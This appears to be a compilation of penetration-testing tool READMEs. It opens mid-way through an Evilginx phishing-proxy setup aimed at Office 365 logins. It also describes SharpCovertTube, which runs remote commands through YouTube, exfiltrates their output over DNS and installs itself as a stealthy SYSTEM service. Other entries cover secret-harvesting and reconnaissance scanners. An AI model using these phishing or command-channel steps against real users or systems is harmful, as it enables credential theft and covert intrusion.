    -config openssl-local.cnf

    Modify private key permissions:

    sudo chmod 600 /etc/ssl/localcerts/fake.com/privkey.pem

    Apache Custom Configs:

    Copy custom substitution files (the core of our approach):

    sudo cp -r ./custom-subs /etc/apache2/custom-subs

Important Note: In this repo I have included 2 substitution configs for Chrome on Mac and Chrome on Windows BITB. Both have auto-detection and styling for light/dark mode and they should act as base templates to achieve the same for other browser/OS combos. Since I did not include automatic detection of the browser/OS combo used to visit our phishing page, you will have to use one of the two or implement your own logic for automatic switching.

    Both config files under /apache-configs/ are the same, only with a different Include directive used for the substitution file that will be included. (there are 2 references for each file)

    # Uncomment the one you want and remember to restart Apache after any changes:
    #Include /etc/apache2/custom-subs/win-chrome.conf
    Include /etc/apache2/custom-subs/mac-chrome.conf

To make things easier, I have included both versions as separate files for this next step.

    Windows/Chrome BITB:

    sudo cp ./apache-configs/win-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

    Mac/Chrome BITB:

    sudo cp ./apache-configs/mac-chrome-bitb.conf /etc/apache2/sites-enabled/000-default.conf

    Test Apache configs to ensure there are no errors:

    sudo apache2ctl configtest

    Restart Apache to apply changes:

    sudo systemctl restart apache2

    Modifying Hosts:

    Get the IP of the VM using ifconfig and note it somewhere for the next step.

    We now need to add new entries to our hosts file, to point the domain used in this demo fake.com and all used subdomains to our VM on which Apache and Evilginx are running.

    On Windows:

    Open Notepad as Administrator (Search > Notepad > Right-Click > Run as Administrator)

    Click on the File option (top-left) and in the File Explorer address bar, copy and paste the following:

    C:\Windows\System32\drivers\etc\

    Change the file types (bottom-right) to "All files".

    Double-click the file named hosts

    On Mac:

    Open a terminal and run the following:

    sudo nano /private/etc/hosts

    Now modify the following records (replace [IP] with the IP of your VM) then paste the records at the end of the hosts file:

    # Local Apache and Evilginx Setup
    [IP] login.fake.com
    [IP] account.fake.com
    [IP] sso.fake.com
    [IP] www.fake.com
    [IP] portal.fake.com
    [IP] fake.com
    # End of section

    Save and exit.

    Now restart your browser before moving to the next step.

    Note: On Mac, use the following command to flush the DNS cache:

    sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder

    Important Note:

This demo is made with the provided Office 365 Enterprise phishlet. To get the host entries you need to add for a different phishlet, use phishlets get-hosts [PHISHLET_NAME] but remember to replace the 127.0.0.1 with the actual local IP of your VM.

    Trusting the Self-Signed SSL Certs:

    Since we are using self-signed SSL certificates, our browser will warn us every time we try to visit fake.com so we need to make our host machine trust the certificate authority that signed the SSL certs.

    For this step, it's easier to follow the video instructions, but here is the gist anyway.

    Open https://fake.com/ in your Chrome browser.

    Ignore the Unsafe Site warning and proceed to the page.

Click the SSL icon > Details > Export Certificate. IMPORTANT: When saving, the name MUST end with .crt for Windows to open it correctly.

Double-click it > Install for current user. Do NOT select automatic; instead, place the certificate in a specific store and select "Trusted Root Certification Authorities".

    On Mac: to install for current user only > select "Keychain: login" AND click on "View Certificates" > details > trust > Always trust

    Now RESTART your Browser

    You should be able to visit https://fake.com now and see the homepage without any SSL warnings.

    Running Evilginx:

    At this point, everything should be ready so we can go ahead and start Evilginx, set up the phishlet, create our lure, and test it.

    Optional: Install tmux (to keep evilginx running even if the terminal session is closed. Mainly useful when running on remote VM.)

    sudo apt install tmux -y

    Start Evilginx in developer mode (using tmux to avoid losing the session):

    tmux new-session -s evilginx
    cd ~/evilginx/
    ./evilginx -developer

    (To re-attach to the tmux session use tmux attach-session -t evilginx)

    Evilginx Config:

    config domain fake.com
    config ipv4 127.0.0.1

    IMPORTANT: Set Evilginx Blacklist mode to NoAdd to avoid blacklisting Apache since all requests will be coming from Apache and not the actual visitor IP.

    blacklist noadd

    Setup Phishlet and Lure:

    phishlets hostname O365 fake.com
    phishlets enable O365
    lures create O365
    lures get-url 0

    Copy the lure URL and visit it from your browser (use Guest user on Chrome to avoid having to delete all saved/cached data between tests).

    Useful Resources

    Original iframe-based BITB by @mrd0x: https://github.com/mrd0x/BITB

    Evilginx Mastery Course by the creator of Evilginx @kgretzky: https://academy.breakdev.org/evilginx-mastery

    My talk at BSides 2023: https://www.youtube.com/watch?v=p1opa2wnRvg

    How to protect Evilginx using Cloudflare and HTML Obfuscation: https://www.jackphilipbutton.com/post/how-to-protect-evilginx-using-cloudflare-and-html-obfuscation

    Evilginx resources for Microsoft 365 by @BakkerJan: https://janbakker.tech/evilginx-resources-for-microsoft-365/

    TODO

    • Create script(s) to automate most of the steps


    Sicat - The Useful Exploit Finder

    By: Zion3R

    Introduction

    SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories effectively. With a focus on cybersecurity, SiCat allows users to quickly search online, finding potential vulnerabilities and relevant exploits for ongoing projects or systems.

    SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploitations. This tool aids cybersecurity professionals and researchers in understanding potential security risks, providing valuable insights to enhance system security.


    SiCat Resources

    Installation

    git clone https://github.com/justakazh/sicat.git && cd sicat

    pip install -r requirements.txt

    Usage


    ~$ python sicat.py --help

    Command Line Options:

Command Description
-h Show help message and exit
-k KEYWORD Keyword to search for
-kv KEYWORD_VERSION Version of the keyword/product
-nm Identify via nmap output
--nvd Use NVD as info source
--packetstorm Use PacketStorm as info source
--exploitdb Use ExploitDB as info source
--exploitalert Use ExploitAlert as info source
--msfmodule Use Metasploit as info source
-o OUTPUT Path to save output to
-ot OUTPUT_TYPE Output file type: json or html

    Examples

    From keyword


    python sicat.py -k telerik --exploitdb --msfmodule

    From nmap output


    nmap --open -sV localhost -oX nmap_out.xml
    python sicat.py -nm nmap_out.xml --packetstorm

    To-do

    • [ ] Input from nmap result from pipeline
    • [ ] Nmap multiple host support
    • [ ] Search NSE Script
    • [ ] Search by PORT

    Contribution

    I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.



    Attackgen - Cybersecurity Incident Response Testing Tool That Leverages The Power Of Large Language Models And The Comprehensive MITRE ATT&CK Framework

    By: Zion3R


    AttackGen is a cybersecurity incident response testing tool that leverages the power of large language models and the comprehensive MITRE ATT&CK framework. The tool generates tailored incident response scenarios based on user-selected threat actor groups and your organisation's details.


    Star the Repo

    If you find AttackGen useful, please consider starring the repository on GitHub. This helps more people discover the tool. Your support is greatly appreciated! ⭐

    Features

    • Generates unique incident response scenarios based on chosen threat actor groups.
    • Allows you to specify your organisation's size and industry for a tailored scenario.
    • Displays a detailed list of techniques used by the selected threat actor group as per the MITRE ATT&CK framework.
    • Create custom scenarios based on a selection of ATT&CK techniques.
    • Capture user feedback on the quality of the generated scenarios.
    • Downloadable scenarios in Markdown format.
    • πŸ†• Use the OpenAI API, Azure OpenAI Service, Mistral API, or locally hosted Ollama models to generate incident response scenarios.
    • Available as a Docker container image for easy deployment.
    • Optional integration with LangSmith for powerful debugging, testing, and monitoring of model performance.


    Releases

    v0.4 (current)

    What's new? Why is it useful?
    Mistral API Integration - Alternative Model Provider: Users can now leverage the Mistral AI models to generate incident response scenarios. This integration provides an alternative to the OpenAI and Azure OpenAI Service models, allowing users to explore and compare the performance of different language models for their specific use case.
    Local Model Support using Ollama - Local Model Hosting: AttackGen now supports the use of locally hosted LLMs via an integration with Ollama. This feature is particularly useful for organisations with strict data privacy requirements or those who prefer to keep their data on-premises. Please note that this feature is not available for users of the AttackGen version hosted on Streamlit Community Cloud at https://attackgen.streamlit.app
    Optional LangSmith Integration - Improved Flexibility: The integration with LangSmith is now optional. If no LangChain API key is provided, users will see an informative message indicating that the run won't be logged by LangSmith, rather than an error being thrown. This change improves the overall user experience and allows users to continue using AttackGen without the need for LangSmith.
    Various Bug Fixes and Improvements - Enhanced User Experience: This release includes several bug fixes and improvements to the user interface, making AttackGen more user-friendly and robust.

    v0.3

    What's new? Why is it useful?
    Azure OpenAI Service Integration - Enhanced Integration: Users can now choose to utilise OpenAI models deployed on the Azure OpenAI Service, in addition to the standard OpenAI API. This integration offers a seamless and secure solution for incorporating AttackGen into existing Azure ecosystems, leveraging established commercial and confidentiality agreements.

    - Improved Data Security: Running AttackGen from Azure ensures that application descriptions and other data remain within the Azure environment, making it ideal for organizations that handle sensitive data in their threat models.
    LangSmith for Azure OpenAI Service - Enhanced Debugging: LangSmith tracing is now available for scenarios generated using the Azure OpenAI Service. This feature provides a powerful tool for debugging, testing, and monitoring of model performance, allowing users to gain insights into the model's decision-making process and identify potential issues with the generated scenarios.

    - User Feedback: LangSmith also captures user feedback on the quality of scenarios generated using the Azure OpenAI Service, providing valuable insights into model performance and user satisfaction.
    Model Selection for OpenAI API - Flexible Model Options: Users can now select from several models available from the OpenAI API endpoint, such as gpt-4-turbo-preview. This allows for greater customization and experimentation with different language models, enabling users to find the most suitable model for their specific use case.
    Docker Container Image - Easy Deployment: AttackGen is now available as a Docker container image, making it easier to deploy and run the application in a consistent and reproducible environment. This feature is particularly useful for users who want to run AttackGen in a containerised environment, or for those who want to deploy the application on a cloud platform.

    v0.2

    What's new? Why is it useful?
    Custom Scenarios based on ATT&CK Techniques - For Mature Organisations: This feature is particularly beneficial if your organisation has advanced threat intelligence capabilities. For instance, if you're monitoring a newly identified or lesser-known threat actor group, you can tailor incident response testing scenarios specific to the techniques used by that group.

    - Focused Testing: Alternatively, use this feature to focus your incident response testing on specific parts of the cyber kill chain or certain MITRE ATT&CK Tactics like 'Lateral Movement' or 'Exfiltration'. This is useful for organisations looking to evaluate and improve specific areas of their defence posture.
    User feedback on generated scenarios - Collecting feedback is essential to track model performance over time and helps to highlight strengths and weaknesses in scenario generation tasks.
    Improved error handling for missing API keys - Improved user experience.
    Replaced Streamlit st.spinner widgets with new st.status widget - Provides better visibility into long running processes (i.e. scenario generation).

    v0.1

    Initial release.

    Requirements

    • Recent version of Python.
    • Python packages: pandas, streamlit, and any other packages necessary for the custom libraries (langchain and mitreattack).
    • OpenAI API key.
    • LangChain API key (optional) - see LangSmith Setup section below for further details.
    • Data files: enterprise-attack.json (MITRE ATT&CK dataset in STIX format) and groups.json.

    Installation

    Option 1: Cloning the Repository

1. Clone this repository:
git clone https://github.com/mrwadams/attackgen.git
2. Change directory into the cloned repository:
cd attackgen
3. Install the required Python packages:
pip install -r requirements.txt

    Option 2: Using Docker

    1. Pull the Docker container image from Docker Hub:
    docker pull mrwadams/attackgen

    LangSmith Setup

    If you would like to use LangSmith for debugging, testing, and monitoring of model performance, you will need to set up a LangSmith account and create a .streamlit/secrets.toml file that contains your LangChain API key. Please follow the instructions here to set up your account and obtain your API key. You'll find a secrets.toml-example file in the .streamlit/ directory that you can use as a template for your own secrets.toml file.

    If you do not wish to use LangSmith, you must still have a .streamlit/secrets.toml file in place, but you can leave the LANGCHAIN_API_KEY field empty.

    Data Setup

Download the latest version of the MITRE ATT&CK dataset in STIX format from here. Make sure to place this file in the ./data/ directory within the repository.

    Running AttackGen

    After the data setup, you can run AttackGen with the following command:

    streamlit run πŸ‘‹_Welcome.py

    You can also try the app on Streamlit Community Cloud.

    Usage

    Running AttackGen

    Option 1: Running the Streamlit App Locally

1. Run the Streamlit app:
streamlit run πŸ‘‹_Welcome.py
2. Open your web browser and navigate to the URL provided by Streamlit.
3. Use the app to generate standard or custom incident response scenarios (see below for details).

    Option 2: Using the Docker Container Image

1. Run the Docker container:
docker run -p 8501:8501 mrwadams/attackgen
This command will start the container and map port 8501 (the default for Streamlit apps) from the container to your host machine.
2. Open your web browser and navigate to http://localhost:8501.
3. Use the app to generate standard or custom incident response scenarios (see below for details).

    Generating Scenarios

    Standard Scenario Generation

    1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
    2. Enter your OpenAI API key, or the API key and deployment details for your model on the Azure OpenAI Service.
3. Select your organisation's industry and size from the dropdown menus.
    4. Navigate to the Threat Group Scenarios page.
    5. Select the Threat Actor Group that you want to simulate.
    6. Click on 'Generate Scenario' to create the incident response scenario.
    7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

    Custom Scenario Generation

    1. Choose whether to use the OpenAI API or the Azure OpenAI Service.
    2. Enter your OpenAI API Key, or the API key and deployment details for your model on the Azure OpenAI Service.
    3. Select your organisation's industry and size from the dropdown menus.
    4. Navigate to the Custom Scenario page.
    5. Use the multi-select box to search for and select the ATT&CK techniques relevant to your scenario.
    6. Click 'Generate Scenario' to create your custom incident response testing scenario based on the selected techniques.
    7. Use the πŸ‘ or πŸ‘Ž buttons to provide feedback on the quality of the generated scenario. N.B. The feedback buttons only appear if a value for LANGCHAIN_API_KEY has been set in the .streamlit/secrets.toml file.

    Please note that generating scenarios may take a minute or so. Once the scenario is generated, you can view it on the app and also download it as a Markdown file.

    Contributing

    I'm very happy to accept contributions to this project. Please feel free to submit an issue or pull request.

    Licence

    This project is licensed under GNU GPLv3.



    Rrgen - A Header Only C++ Library For Storing Safe, Randomly Generated Data Into Modern Containers

    By: Zion3R


This library was developed to combat insecure methods of storing random data in modern C++ containers, such as relying on old and clunky PRNGs. Thus, rrgen uses STL's distribution engines in order to efficiently and safely store a random number distribution into a given C++ container.


    Installation

    1) git clone https://github.com/josh0xA/rrgen.git
    2) cd rrgen
    3) make
    4) Add include/rrgen.hpp to your project tree for access to the library classes and functions.

    Official Documentation

    rrgen/docs/index.rst

    Supported Containers

    1) std::vector<>
    2) std::list<>
    3) std::array<>
    4) std::stack<>

    Example Usages

#include "../include/rrgen.hpp"
#include <iostream>

int main(void)
{
    // Example usage for rrgen vector
    rrgen::rrand<float, std::vector, 10> rrvec;
    rrvec.gen_rrvector(false, true, 0, 10);
    for (auto &i : rrvec.contents())
    {
        std::cout << i << " ";
    } // ^ the same as rrvec.show_contents()

    // Example usage for rrgen list (frontside insertion)
    rrgen::rrand<int, std::list, 10> rrlist;
    rrlist.gen_rrlist(false, true, "fside", 5, 25);
    std::cout << '\n'; rrlist.show_contents();
    std::cout << "Size: " << rrlist.contents().size() << '\n';

    // Example usage for rrgen array
    rrgen::rrand_array<int, 5> rrarr;
    rrarr.gen_rrarray(false, true, 5, 35);
    for (auto &i : rrarr.contents())
    {
        std::cout << i << " ";
    } // ^ the same as rrarr.show_contents()

    // Example usage for rrgen stack
    rrgen::rrand_stack<float, 10> rrstack;
    rrstack.gen_rrstack(false, true, 200, 1000);
    for (auto m = rrstack.xsize(); m > 0; m--)
    {
        std::cout << rrstack.grab_top() << " ";
        rrstack.pop_off();
        if (m == 1) { std::cout << '\n'; }
    }
}

    Note: This is a transferred repository, from a completely unrelated project.



    Pentest-Muse-Cli - AI Assistant Tailored For Cybersecurity Professionals

    By: Zion3R


    Pentest Muse is an AI assistant tailored for cybersecurity professionals. It can help penetration testers brainstorm ideas, write payloads, analyze code, and perform reconnaissance. It can also take actions, execute command line codes, and iteratively solve complex tasks.


    Pentest Muse Web App

    In addition to this command-line tool, we are excited to introduce the Pentest Muse Web Application! The web app has access to the latest online information, and would be a good AI assistant for your pentesting job.

    Disclaimer

    This tool is intended for legal and ethical use only. It should only be used for authorized security testing and educational purposes. The developers assume no liability and are not responsible for any misuse or damage caused by this program.

    Requirements

    • Python 3.12 or later
    • Necessary Python packages as listed in requirements.txt

    Setup

    Standard Setup

    1. Clone the repository:

git clone https://github.com/pentestmuse-ai/PentestMuse
cd PentestMuse

    1. Install the required packages:

    pip install -r requirements.txt

    Alternative Setup (Package Installation)

    Install Pentest Muse as a Python Package:

    pip install .

    Running the Application

    Chat Mode (Default)

    In the chat mode, you can chat with pentest muse and ask it to help you brainstorm ideas, write payloads, and analyze code. Run the application with:

    python run_app.py

    or

    pmuse

    Agent Mode (Experimental)

You can also give Pentest Muse more control by asking it to take actions for you with the agent mode. In this mode, Pentest Muse can help you finish a simple task (e.g., 'help me do sql injection test on url xxx'). To start the program in agent mode, you can use:

    python run_app.py agent

    or

    pmuse agent

    Selection of Language Models

    Managed APIs

You can use Pentest Muse with our managed APIs after signing up at www.pentestmuse.ai/signup. After creating an account, you can simply start the Pentest Muse CLI, and the program will prompt you to log in.

    OpenAI API keys

Alternatively, you can also choose to use your own OpenAI API keys. To do this, simply add the argument --openai-api-key=[your openai api key] when starting the program.

    Contact

    For any feedback or suggestions regarding Pentest Muse, feel free to reach out to us at contact@pentestmuse.ai or join our discord. Your input is invaluable in helping us improve and evolve.



    Skytrack - Planespotting And Aircraft OSINT Tool Made Using Python

    By: Zion3R

    About

skytrack is a command-line based plane spotting and aircraft OSINT reconnaissance tool made using Python. It can gather aircraft information using various data sources, generate a PDF report for a specified aircraft, and convert between ICAO and Tail Number designations. Whether you are a hobbyist plane spotter or an experienced aircraft analyst, skytrack can help you identify and enumerate aircraft for general purpose reconnaissance.


    What is Planespotting & Aircraft OSINT?

Planespotting is the art of tracking down and observing aircraft. While planespotting mostly consists of photography and videography of aircraft, aircraft information gathering and OSINT is a crucial step in the planespotting process. OSINT (Open Source Intelligence) describes a methodology of using publicly accessible data sources to obtain data about a specific subject, in this case planes!

    Aircraft Information

    • Tail Number πŸ›«
    • Aircraft Type βš™οΈ
    • ICAO24 Designation πŸ”Ž
    • Manufacturer Details πŸ› 
    • Flight Logs πŸ“„
    • Aircraft Owner ✈️
    • Model πŸ›©
    • Much more!

    Usage

    To run skytrack on your machine, follow the steps below:

    $ git clone https://github.com/ANG13T/skytrack
    $ cd skytrack
    $ pip install -r requirements.txt
    $ python skytrack.py

skytrack works best with Python 3.

    Preview

    Features

skytrack features three main functions for aircraft information gathering and display options. They include the following:

    Aircraft Reconnaissance & OSINT

    skytrack obtains general information about the aircraft given its tail number or ICAO designator. The tool sources this information using several reliable data sets. Once the data is collected, it is displayed in the terminal within a table layout.

    PDF Aircraft Information Report

skytrack also enables you to save the collected aircraft information as a PDF. The PDF includes all the aircraft data in a visual layout for later reference. The PDF report will be titled "skytrack_report.pdf".

    Tail Number to ICAO Converter

There are two standard identification formats for specifying aircraft: Tail Number and ICAO Designation. The tail number (aka N-Number) is an alphanumerical ID starting with the letter "N" used to identify aircraft. The ICAO type designation is a six-character fixed-length ID in the hexadecimal format. Both standards are highly pertinent for aircraft reconnaissance as they both can be used to search for a specific aircraft in data sources. However, converting them from one format to another can be rather cumbersome as it follows a tricky algorithm. To streamline this process, skytrack includes a standard converter.

    Further Explanation

    ICAO and Tail Numbers follow a mapping system like the following:

ICAO address    N-Number (Tail Number)
a00001          N1
a00002          N1A
a00003          N1AA

    You can learn more about aircraft registration numbers [here](https://www.faa.gov/licenses_certificates/aircraft_certification/aircraft_registry/special_nnumbers)

    :warning: Converter only works for USA-registered aircraft

    Data Sources & APIs Used

    ICAO Aircraft Type Designators Listings

    FlightAware

    Wikipedia

    Aviation Safety Website

    Jet Photos Website

    OpenSky API

    Aviation Weather METAR

    Airport Codes Dataset

    Contributing

    skytrack is open to any contributions. Please fork the repository and make a pull request with the features or fixes you want to implement.

    Upcoming

    • Obtain Latest Flown Airports
    • Obtain Airport Information
    • Obtain ATC Frequency Information

    Support

    If you enjoyed skytrack, please consider becoming a sponsor or donating on buymeacoffee in order to fund my future projects.

    To check out my other works, visit my GitHub profile.



    Dorkish - Chrome Extension Tool For OSINT & Recon

    By: Zion3R


During the reconnaissance phase or when doing OSINT, we often use Google dorking and Shodan, and thus the idea of Dorkish was born.
Dorkish is a Chrome extension that facilitates custom dork creation for Google and Shodan using its builder, and it offers prebuilt dorks for efficient reconnaissance and OSINT engagements.


    Installation And Setup

    1- Clone the repository

    git clone https://github.com/yousseflahouifi/dorkish.git

    2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.
3- Click on the Load unpacked extension button and select the dorkish folder.

Note: Firefox users can find the extension here: https://addons.mozilla.org/en-US/firefox/addon/dorkish/

    Features

    Google dorking

    • Builder with keywords to filter your google search results.
    • Prebuilt dorks for Bug bounty programs.
    • Prebuilt dorks used during the reconnaissance phase in bug bounty.
    • Prebuilt dorks for exposed files and directories
    • Prebuilt dorks for logins and sign up portals
• Prebuilt dorks for cyber security jobs

    Shodan dorking

• Builder with filter keywords used in Shodan.
• Variety of prebuilt dorks to find IoT, network infrastructure, cameras, ICS, databases, etc.

    Usage

    Once you have found or built the dork you need, simply click it and click search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've entered. Then, you can explore and enjoy the results that match your query.

    TODO

    • Add more useful dorks and catogories
    • Fix some bugs
    • Add a search bar to search through the results
    • Might add some LLM models to build dorks

    Notes

I have built some dorks myself and used some public resources to gather others; here are a few:
- https://github.com/lothos612/shodan
- https://github.com/TakSec/google-dorks-bug-bounty

    Warning

    • I am not responsible for any damage caused by using the tool


    SharpCovertTube - Youtube As Covert-Channel - Control Windows Systems Remotely And Execute Commands By Uploading Videos To Youtube

    By: Zion3R


    SharpCovertTube is a program created to control Windows systems remotely by uploading videos to Youtube.

    The program monitors a Youtube channel until a video is uploaded, decodes the QR code from the thumbnail of the uploaded video and executes a command. The QR codes in the videos can use cleartext or AES-encrypted values.

    It has two versions, binary and service binary, and it includes a Python script to generate the malicious videos. Its purpose is to serve as a persistence method using only web requests to the Google API.



    Usage

    Run the listener in your Windows system:

It will check the Youtube channel at a specific interval (10 minutes by default) until a new video is uploaded. In this case, we upload "whoami.avi" from the folder example-videos:

    After finding there is a new video in the channel, it decodes the QR code from the video thumbnail, executes the command and the response is base64-encoded and exfiltrated using DNS:

    This works also for QR codes with AES-encrypted payloads and longer command responses. In this example, the file "dirtemp_aes.avi" from example-videos is uploaded and the content of c:\temp is exfiltrated using several DNS queries:

Logging to a file is optional, but you must check that the folder for that file exists on the system; the default value is "c:\temp\.sharpcoverttube.log". DNS exfiltration is also optional and can be tested using Burp's collaborator:

    As an alternative, I created this repository with scripts to monitor and parse the base64-encoded DNS queries containing the command responses.
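
For illustration only, here is a small Python sketch of how a command response could be base64-encoded and split into DNS-label-sized chunks under the configured dns_hostname; the actual chunking and encoding SharpCovertTube uses may differ:

import base64

# Conceptual sketch: split a base64-encoded response into DNS query names.
# The 63-character label limit and the ".test.org" suffix mirror the defaults
# described below; the exact scheme used by the tool may differ.
def exfil_queries(response: str, hostname: str = ".test.org", chunk: int = 63):
    # base64url without padding keeps each label DNS-safe.
    encoded = base64.urlsafe_b64encode(response.encode()).decode().rstrip("=")
    for i in range(0, len(encoded), chunk):
        yield encoded[i:i + chunk] + hostname

for query in exfil_queries("Volume in drive C has no label."):
    print(query)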


    Configuration

    There are some values you can change, you can find them in Configuration.cs file for the regular binary and the service binary. Only the first two have to be updated:

    • channel_id (Mandatory!!!): Get your Youtube channel ID from here.
    • api_key (Mandatory!!!): To get the API key create an application and generate the key from here.
• payload_aes_key (Optional. Default: "0000000000000000"): AES key for decrypting QR codes (if using AES). It must be a 16-character string.
• payload_aes_iv (Optional. Default: "0000000000000000"): AES IV for decrypting QR codes (if using AES). It must be a 16-character string.
    • seconds_delay (Optional. Default: 600): Seconds of delay until checking if a new video has been uploaded. If the value is low you will exceed the API rate limit.
    • debug_console (Optional. Default: true): Show debug messages in console or not.
    • log_to_file (Optional. Default: true): Write debug messages in log file or not.
    • log_file (Optional. Default: "c:\temp\.sharpcoverttube.log"): Log file path.
    • dns_exfiltration (Optional. Default: true): Exfiltrate command responses through DNS or not.
    • dns_hostname (Optional. Default: ".test.org"): DNS hostname to exfiltrate the response from commands executed in the system.


    Generating videos with QR codes

    You can generate the videos from Windows using Python3. For that, first install the dependencies:

    pip install Pillow opencv-python pyqrcode pypng pycryptodome rebus

    Then run the generate_video.py script:

    python generate_video.py -t TYPE -f FILE -c COMMAND [-k AESKEY] [-i AESIV]
    • TYPE (-t) must be "qr" for payloads in cleartext or "qr_aes" if using AES encryption.

    • FILE (-f) is the path where the video is generated.

    • COMMAND (-c) is the command to execute in the system.

    • AESKEY (-k) is the key for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.

    • AESIV (-i) is the IV for AES encryption, only necessary if using the type "qr_aes". It must be a string of 16 characters and the same as in Program.cs file in SharpCovertTube.


    Examples

    Generate a video with a QR value of "whoami" in cleartext in the path c:\temp\whoami.avi:

    python generate_video.py -t qr -f c:\temp\whoami.avi -c whoami

    Generate a video with an AES-encrypted QR value of "dir c:\windows\temp" with the key and IV "0000000000000000" in the path c:\temp\dirtemp_aes.avi:

    python generate_video.py -t qr_aes -f c:\temp\dirtemp_aes.avi -c "dir c:\windows\temp" -k 0000000000000000 -i 0000000000000000
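
For reference, the AES step behind a qr_aes payload can be sketched in a few lines of Python with pycryptodome (one of the dependencies installed above). This is only a hedged illustration; the padding and output encoding used by generate_video.py may differ:

import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

# Sketch: AES-CBC encrypt a command with a 16-character key and IV, matching the
# example values above. CBC mode and base64 output are assumptions on my part.
key = b"0000000000000000"
iv = b"0000000000000000"
command = b"dir c:\\windows\\temp"

cipher = AES.new(key, AES.MODE_CBC, iv)
payload = base64.b64encode(cipher.encrypt(pad(command, AES.block_size))).decode()
print(payload)  # this string is what would end up encoded in the QR code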



    Running it as a service

    You can find the code to run it as a service in the SharpCovertTube_Service folder. It has the same functionalities except self-deletion, which would not make sense in this case.

It is possible to install it with InstallUtil; it is prepared to run as the SYSTEM user, and you need to install it as administrator:

    InstallUtil.exe SharpCovertTube_Service.exe

    You can then start it with:

    net start "SharpCovertTube Service"

If you have administrative privileges, this may be stealthier than the ordinary binary, but the "Description" and "DisplayName" should be updated (as you can see in the image above). If you do not have those privileges, you cannot install services, so you can only use the ordinary binary.


    Notes
• The file must be 64-bit!!! This is due to the code used for QR decoding, which is borrowed from Stefan Gansevles's QR-Capture project, who borrowed part of it from Uzi Granot's QRCode project, who at the same time borrowed part of it from Zakhar Semenov's Camera_Net project (then I lost track). So thanks to all of them!

    • This project is a port from covert-tube, a project I developed in 2021 using just Python, which was inspired by Welivesecurity blogs about Casbaneiro and Numando malwares.



    swaggerHole - A Python3 Script Searching For Secret On Swaggerhub

    By: Zion3R


Introduction

This tool is made to automate the process of retrieving secrets in the public APIs on [swaggerHub](https://app.swaggerhub.com/search). This tool is multithreaded and pipe mode is available :)

Requirements

• python3 (sudo apt install python3)
• pip3 (sudo apt install python3-pip)

Installation

pip3 install swaggerhole

or clone this repository and run:

git clone https://github.com/Liodeus/swaggerHole.git
pip3 install .

    Usage

       _____ _      __ ____ _ ____ _ ____ _ ___   _____
    / ___/| | /| / // __ `// __ `// __ `// _ \ / ___/
    (__ ) | |/ |/ // /_/ // /_/ // /_/ // __// /
    /____/ |__/|__/ \__,_/ \__, / \__, / \___//_/
    __ __ __ /____/ /____/
    / / / /____ / /___
    / /_/ // __ \ / // _ \
    / __ // /_/ // // __/
    /_/ /_/ \____//_/ \___/

    usage: swaggerhole [-h] [-s SEARCH] [-o OUT] [-t THREADS] [-j] [-q] [-du] [-de]

    optional arguments:
    -h, --help show this help message and exit
    -s SEARCH, --search SEARCH
    Term to search
    -o OUT, --out OUT Output directory
    -t THREADS, --threads THREADS
    Threads number (Default 25)
    -j, --json Json ouput
    -q, --quiet Remove banner
    -du, --deactivate_url
    Deactivate the URL filtering
    -de, --deactivate_email
    Deactivate the email filtering

    Search for secret about a domain

    swaggerHole -s test.com

    echo test.com | swaggerHole

    Search for secret about a domain and output to json

    swaggerHole -s test.com --json

    echo test.com | swaggerHole --json

    Search for secret about a domain and do it fast :)

    swaggerHole -s test.com -t 100

    echo test.com | swaggerHole -t 100

    Output explanation

    Normal output

`Finding_Type - Finding - [Swagger_Name][Date_Last_Update][Line:Number]`

    Json output

`{"Finding_Type": Finding, "File": File_path, "Date": Date_Last_Update, "Line": Number}`
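
If you want to post-process the JSON findings, a short script will do. The sketch below assumes one JSON object per line in a file named findings.json (both assumptions; adjust to your output directory):

import json
from collections import defaultdict

# Minimal sketch: group swaggerHole JSON findings by type and count them.
# One object per line and the "findings.json" file name are assumptions.
by_type = defaultdict(list)
with open("findings.json", encoding="utf-8") as fh:
    for line in fh:
        line = line.strip()
        if line:
            finding = json.loads(line)
            by_type[finding["Finding_Type"]].append(finding)

for finding_type, items in by_type.items():
    print(f"{finding_type}: {len(items)} finding(s)")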

Deactivate url/email

Using -du or -de removes the filtering done by the tool. There are more false positives with those options.

    RepoReaper - An Automated Tool Crafted To Meticulously Scan And Identify Exposed .Git Repositories Within Specified Domains And Their Subdomains

    By: Zion3R


    RepoReaper is a precision tool designed to automate the identification of exposed .git repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.
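
As a rough sketch of the core check (the exact probe and heuristics RepoReaper uses may differ), a domain can be flagged when its /.git/HEAD file is publicly readable:

import requests

# Minimal sketch: flag domains whose /.git/HEAD is publicly readable.
# The exact paths and heuristics RepoReaper uses may differ.
def git_exposed(domain: str) -> bool:
    for scheme in ("https", "http"):
        url = f"{scheme}://{domain}/.git/HEAD"
        try:
            resp = requests.get(url, timeout=5, allow_redirects=False)
        except requests.RequestException:
            continue
        if resp.status_code == 200 and resp.text.strip().startswith("ref:"):
            return True
    return False

with open("domains.txt") as fh:  # one domain/subdomain per line, as described below
    for domain in (d.strip() for d in fh if d.strip()):
        if git_exposed(domain):
            print(f"[!] Exposed .git repository: {domain}")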


    Features
    • Automated scanning of domains and subdomains for exposed .git repositories.
    • Streamlines the detection of sensitive data exposures.
    • User-friendly command-line interface.
    • Ideal for security audits and Bug Bounty.

    Installation

    Clone the repository and install the required dependencies:

    git clone https://github.com/YourUsername/RepoReaper.git
    cd RepoReaper
    pip install -r requirements.txt
    chmod +x RepoReaper.py

    Usage

    RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.

    To start RepoReaper, simply run:

    ./RepoReaper.py
    or
    python3 RepoReaper.py

